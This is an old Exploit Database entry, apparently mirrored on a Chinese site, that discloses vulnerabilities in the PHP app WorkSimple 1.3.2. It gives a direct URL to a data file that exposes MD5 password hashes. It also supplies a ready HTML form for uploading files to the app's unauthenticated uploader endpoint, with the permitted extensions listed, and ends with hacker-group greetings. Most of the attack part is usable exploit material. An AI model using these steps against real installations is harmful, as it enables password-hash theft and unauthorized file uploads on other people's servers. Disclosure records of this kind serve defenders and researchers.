WorkSimple 1.3.2 – Multiple Vulnerabilities

• Exploit Database
• 32 阅读

• 作者： JIKO
  日期： 2010-02-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11550/

• [ Multiple Remote Vulnerabilities ]
  ----------[Script Info]
  
  Moi : JIKO
  Site : No-exploit.Com
  Email : mm :( Moghla9 Ferme Closed
  
  ----------[Script Info]
  
  Name : WorkSimple
  Site:http : http://geekness.eu/ or http://easton.4fd.us/
  Download : http://geekness.eu/sites/default/files/worksimple_1.3.2.zip
  
  ----------[exploit Info]
  
  1]~[Password Disclosure Vulnerability]
  
  For All Version
  
  http://localhost/Path/data/secret.php
  
  Name:Md5(Pass)
  
  1]~[Remote File Upload Vulnerability]
  file :/modules/uploader.php?startupload
  array(".phps",".txt",".html",".png", ".html", ".htm",".jpg",".png", ".bmp",".c",".cpp", ".css", ".h", ".gif", ".torrent", ".jpeg");
  ---
  <form enctype='multipart/form-data' action='[SITE]/modules/uploader.php?startupload' method='post'>
  <input type='hidden' name='MAX_FILE_SIZE' value='500000' />
  Upload a file: <input name='uploadedfile' size='14' type='file' />
  <BR><BR>
  <input class='button' type='submit' value='upload' />
  </form>
  ---
  
  HxH, Cyb3r-DeViL, leopard, ZaIdOoHxHaCkEr, virusman, The Sadhacker,
  Member No-exploit.Com